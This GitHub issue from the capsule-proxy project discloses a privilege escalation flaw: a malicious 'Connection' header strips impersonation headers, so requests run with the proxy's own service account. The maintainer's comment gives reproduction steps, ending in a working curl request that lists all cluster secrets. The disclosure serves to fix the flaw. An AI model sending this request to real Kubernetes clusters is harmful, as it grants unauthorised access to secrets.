Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Privilege escalation vulnerability via malicious "Connection" header #188

Closed
prometherion opened this issue Feb 18, 2022 · 1 comment · Fixed by #189
Closed

Privilege escalation vulnerability via malicious "Connection" header #188

prometherion opened this issue Feb 18, 2022 · 1 comment · Fixed by #189
Assignees
Labels
bug Something isn't working
Milestone

Comments

@prometherion
Copy link
Member

A user crafting an API request directed at capsule-proxy can get a privilege escalation using the Service Account of the proxy itself.

This is done by passing the Impersonate-User or Impersonate-Group header in the Connection header, using the same exploit described here: GHSA-pvxj-25m6-7vqr

At this point, instead of impersonating the user and their permissions, the request will act as if it was from the Rancher management server Capsule Proxy and incorrectly return the information.

@prometherion prometherion added the bug Something isn't working label Feb 18, 2022
@prometherion prometherion self-assigned this Feb 18, 2022
@prometherion
Copy link
Member Author

prometherion commented Feb 18, 2022

Steps on how to reproduce

kind create cluster --name capsule --wait 60s
helm upgrade --install capsule clastix/capsule -n capsule-system --create-namespace
mkcert 127.0.0.1 && kubectl --namespace capsule-system create secret tls capsule-proxy --key=./127.0.0.1-key.pem --cert ./127.0.0.1.pem
helm upgrade --install capsule-proxy clastix/capsule-proxy -n capsule-system --create-namespace
kubectl -n capsule-system port-forward svc/capsule-proxy 9001
export TOKEN=$(any valid token)

curl --cacert /home/prometherion/.local/share/mkcert/rootCA.pem "https://localhost:9001/api/v1/secrets" -H "Authorization: Bearer $TOKEN" -H "Connection: Imperso
nate-User,Impersonate-Group" -0

Many kudos to @carpenterm and @enj for pointing this out! 🙏🏻

A review for the proposed PR would be great, along with the direct maintainers, such as @bsctl and @MaxFedotov!

@prometherion prometherion added this to the v0.2.1 milestone Feb 18, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working
Projects
None yet
Development

Successfully merging a pull request may close this issue.

1 participant